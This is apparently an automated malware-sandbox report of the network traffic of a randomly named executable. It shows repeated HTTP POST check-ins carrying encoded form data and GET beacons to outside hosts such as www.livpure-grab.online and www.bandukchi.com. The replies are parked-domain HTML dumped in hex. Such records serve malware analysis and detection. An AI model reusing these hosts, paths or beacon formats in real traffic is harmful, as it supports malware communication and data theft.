                                                                                                                                                                                                                                              Data Ascii: port.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger rel=nofollow>Change nameservers</a></div></div></div></div></div><script>var punycode=new function(){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027940035 CEST1236INData Raw: 30 3c 63 3f 63 2b 31 3a 30 3b 64 3c 45 3b 29 7b 66 6f 72 28 6c 3d 66 2c 70 3d 31 2c 67 3d 6f 3b 3b 67 2b 3d 6f 29 7b 69 66 28 45 3c 3d 64 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75
                                                                                                                                                                                                                                              Data Ascii: 0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeError("punycode_bad_input(1)");if(v=e.charCodeAt(d++),o<=(s=v-48<10?v-22:v-65<26?v-65:v-97<26?v-97:o))throw RangeError("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027952909 CEST700INData Raw: 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68 29 7b 66 6f 72 28 70 3d 66 2c 67 3d 6f 3b 21 28 70 3c 28 73 3d 67 3c 3d 75 3f 31 3a 75 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 75 29 29 3b 67 2b 3d 6f 29 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e
                                                                                                                                                                                                                                              Data Ascii: rflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},thi


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              25192.168.2.55000784.32.84.32802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:20.224915981 CEST761OUTPOST /r966/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.livpure-grab.online
                                                                                                                                                                                                                                              Origin: http://www.livpure-grab.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.livpure-grab.online/r966/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 66 76 63 54 4e 52 6a 42 34 35 66 6d 65 57 57 6e 63 64 43 51 70 5a 4d 66 6e 77 57 66 59 46 66 32 6b 45 45 6e 75 30 36 2b 35 7a 59 56 55 65 79 76 73 75 71 4f 53 49 79 73 36 36 74 33 4e 38 76 67 55 57 75 6a 71 48 61 77 4d 47 48 35 48 34 32 31 74 4b 72 4f 61 4f 34 33 71 59 71 6b 69 55 64 31 63 4c 51 5a 44 78 63 34 5a 37 63 51 79 30 4d 51 50 32 67 46 30 7a 4b 72 46 71 6b 79 79 61 55 35 48 57 4f 45 66 6f 6a 35 6a 41 30 76 72 36 4f 32 49 2f 54 6a 42 38 4a 62 46 36 49 32 65 5a 34 43 6f 4c 44 2f 6b 41 2b 55 6d 71 42 54 76 77 6b 42 50 32 4b 42 66 55 46 37 61 4b 38 6a 62 59 55 32 48 63 50 66 63 4d 6f 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=fvcTNRjB45fmeWWncdCQpZMfnwWfYFf2kEEnu06+5zYVUeyvsuqOSIys66t3N8vgUWujqHawMGH5H421tKrOaO43qYqkiUd1cLQZDxc4Z7cQy0MQP2gF0zKrFqkyyaU5HWOEfoj5jA0vr6O2I/TjB8JbF6I2eZ4CoLD/kA+UmqBTvwkBP2KBfUF7aK8jbYU2HcPfcMo=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              26192.168.2.55000884.32.84.32802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:22.776475906 CEST781OUTPOST /r966/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.livpure-grab.online
                                                                                                                                                                                                                                              Origin: http://www.livpure-grab.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.livpure-grab.online/r966/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 66 76 63 54 4e 52 6a 42 34 35 66 6d 63 32 47 6e 50 38 43 51 73 35 4d 63 6f 51 57 66 58 6c 66 79 6b 45 49 6e 75 78 44 6a 35 68 38 56 58 2f 43 76 2b 2f 71 4f 54 49 79 73 39 4b 74 75 43 63 76 70 55 57 71 4e 71 47 4b 77 4d 47 54 35 48 36 75 31 74 36 58 4a 62 65 34 70 32 59 71 6d 2f 6b 64 31 63 4c 51 5a 44 78 59 53 5a 37 55 51 79 45 63 51 4f 56 34 47 33 7a 4c 5a 43 71 6b 79 34 36 55 39 48 57 4f 69 66 71 58 66 6a 45 45 76 72 2f 4b 32 4c 72 6e 67 59 4d 4a 52 50 61 4a 5a 5a 70 64 6d 68 5a 33 41 6b 41 6a 48 7a 4c 70 33 6e 6d 4a 72 56 55 43 70 4d 30 70 44 4b 5a 30 55 4b 6f 31 66 64 2f 66 76 43 62 39 6c 66 63 66 33 4e 63 4f 69 62 30 30 6e 62 4c 48 2b 61 57 47 49
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=fvcTNRjB45fmc2GnP8CQs5McoQWfXlfykEInuxDj5h8VX/Cv+/qOTIys9KtuCcvpUWqNqGKwMGT5H6u1t6XJbe4p2Yqm/kd1cLQZDxYSZ7UQyEcQOV4G3zLZCqky46U9HWOifqXfjEEvr/K2LrngYMJRPaJZZpdmhZ3AkAjHzLp3nmJrVUCpM0pDKZ0UKo1fd/fvCb9lfcf3NcOib00nbLH+aWGI


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              27192.168.2.55000984.32.84.32802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:25.327523947 CEST1798OUTPOST /r966/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.livpure-grab.online
                                                                                                                                                                                                                                              Origin: http://www.livpure-grab.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.livpure-grab.online/r966/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 66 76 63 54 4e 52 6a 42 34 35 66 6d 63 32 47 6e 50 38 43 51 73 35 4d 63 6f 51 57 66 58 6c 66 79 6b 45 49 6e 75 78 44 6a 35 68 30 56 55 4e 6d 76 73 4d 43 4f 51 49 79 73 2b 4b 74 72 43 63 75 70 55 57 53 4a 71 47 48 4c 4d 45 72 35 45 5a 6d 31 70 34 7a 4a 43 4f 34 70 39 34 71 6e 69 55 64 61 63 50 38 64 44 77 6f 53 5a 37 55 51 79 43 67 51 65 32 67 47 78 7a 4b 72 46 71 6b 32 79 61 55 5a 48 57 57 63 66 71 53 69 6a 31 34 76 6f 66 36 32 45 2b 54 67 48 38 4a 58 4d 61 4a 42 5a 70 68 35 68 64 57 78 6b 44 2b 63 7a 49 35 33 30 43 63 58 4b 33 61 54 65 56 4a 79 4b 49 31 30 54 63 42 61 43 74 65 61 66 61 4a 72 65 4f 54 34 45 71 2b 54 57 56 39 31 50 4e 50 52 56 67 50 50 71 39 61 66 42 44 74 53 41 49 54 33 43 65 63 78 6d 6a 2f 37 61 59 6b 50 42 4b 4e 56 61 43 67 6a 67 7a 6d 4e 79 68 7a 6d 49 2f 49 75 66 46 4b 72 78 75 58 50 76 5a 39 30 79 35 4e 57 79 51 4c 50 70 65 70 2f 54 33 2f 55 32 34 72 4c 35 47 55 54 57 55 54 61 4d 50 6f 6e 6d 6c 35 58 32 2f 54 30 79 65 64 72 6f 44 2b 71 49 6d 61 59 6e 6f 47 4e [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=fvcTNRjB45fmc2GnP8CQs5McoQWfXlfykEInuxDj5h0VUNmvsMCOQIys+KtrCcupUWSJqGHLMEr5EZm1p4zJCO4p94qniUdacP8dDwoSZ7UQyCgQe2gGxzKrFqk2yaUZHWWcfqSij14vof62E+TgH8JXMaJBZph5hdWxkD+czI530CcXK3aTeVJyKI10TcBaCteafaJreOT4Eq+TWV91PNPRVgPPq9afBDtSAIT3Cecxmj/7aYkPBKNVaCgjgzmNyhzmI/IufFKrxuXPvZ90y5NWyQLPpep/T3/U24rL5GUTWUTaMPonml5X2/T0yedroD+qImaYnoGNfTxck4w8dySrvlXzWHgq34yuAKQLW/0/Rr8Y09g4+pjNuLyj/2AfImuMr8phJjna/eKZQYkEcS1qi6IXj25tmkhKVYNV/9vds+Q9NmyTp0WMvRtdYPLrL2R20+GI3Zr+N4lakviGdCayN5VKyFH0rFVwCqFvIsxfw1aINtj4vnM8o7w6DoVB5rXBD1gYtsnuX9cmInMiyNi9KI6cmS0GJzv/wZ8wHyXxpjjHQMQzS5nzl1B6sXRqnK4xal+vD7wuOCyLFD2TJ/v5rDSe5GEcAck9OJsZLeFDQWYklaEGbAB3fBF69flUslIdmaposbC4E6NUNDKzOaXCPY9IBYOTRX6jdWAChwMZExFNAYX6U4T7rDRQjS6GkkvtMJ7vjWhdkE/GkbcinlyeA+j5rOo2SvDsxE/9BhlG1+b+fYfmYD3TSa2EqaNcsUSsDT2iv3IeIcDq6sLUlSNe0F4uH5b32tFuSX3kW9O4f17uC0zNJMvjs2x/t18gUE6j1UiS6wo4d/rIqFkP2Lmp5pFDh7NdHEvChTKmbZyPBdxO4LXi3WtmCnksBNtjJEs8RAEj8MlLWyQnsNr2OYZtD9Ow76joR9ZTw4B0xkdGtXjiYq/4QLKMOdOzxV0Dosl5HHs2bJzPSGYcPkP5i9fB/zMI+trB4wXIOt4EACt/OV [TRUNCATED]


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              28192.168.2.55001084.32.84.32802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:27.867914915 CEST489OUTGET /r966/?vD=h0e85v&7Bohe=St0zOmS57JvxXHngaoKRrYwJhw67SG7V3FAZs2TYvCYNXtW49c+AatXE2ZBTP/KNdGCD9DmtL2naWYac77vyUP4q1YSJ6U5Kf8MwRQ43aJ1o9SgGH2ER+UvSNI1J5J1sVQ== HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.livpure-grab.online
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733262062 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: hcdn
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:19:28 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 10072
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              x-hcdn-request-id: 7ca042d3e2b5c540dd4446897761e89f-int-edge1
                                                                                                                                                                                                                                              Expires: Thu, 24 Oct 2024 13:19:27 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733275890 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                                                                                                                                                                              Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733319998 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                                                                                                                                                                                              Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733330965 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                                                                                                                                                                                              Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733342886 CEST848INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                                                                                                                                                                                              Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733352900 CEST1236INData Raw: 63 6c 61 73 73 3d 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 3e 48 61 70 70 79 20 74 6f 20 73 65 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 77 69 74 68 20 48 6f 73 74 69 6e 67 65 72 21 3c 2f 64 69 76 3e 3c 70 3e 59 6f 75 72 20 64 6f 6d 61 69
                                                                                                                                                                                                                                              Data Ascii: class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=https://cdn.hostinger
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733366013 CEST1236INData Raw: 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 43 68 61 6e 67 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76
                                                                                                                                                                                                                                              Data Ascii: stom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733375072 CEST424INData Raw: 65 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 61 3d 31 32 38 2c 66 3d 30 2c 69 3d 37 32 2c 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b
                                                                                                                                                                                                                                              Data Ascii: e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733386993 CEST1236INData Raw: 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 31 29 22 29 3b 69 66 28 66 2b 3d 73 2a 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36
                                                                                                                                                                                                                                              Data Ascii: floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("p
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733715057 CEST488INData Raw: 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 3d 6f 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e
                                                                                                                                                                                                                                              Data Ascii: }++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.733725071 CEST488INData Raw: 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 3d 6f 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e
                                                                                                                                                                                                                                              Data Ascii: }++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:28.984857082 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: hcdn
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:19:28 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 10072
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              x-hcdn-request-id: 7ca042d3e2b5c540dd4446897761e89f-int-edge1
                                                                                                                                                                                                                                              Expires: Thu, 24 Oct 2024 13:19:27 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              29192.168.2.5500113.33.130.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:34.029742956 CEST743OUTPOST /4nqw/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.bandukchi.com
                                                                                                                                                                                                                                              Origin: http://www.bandukchi.com
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.bandukchi.com/4nqw/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
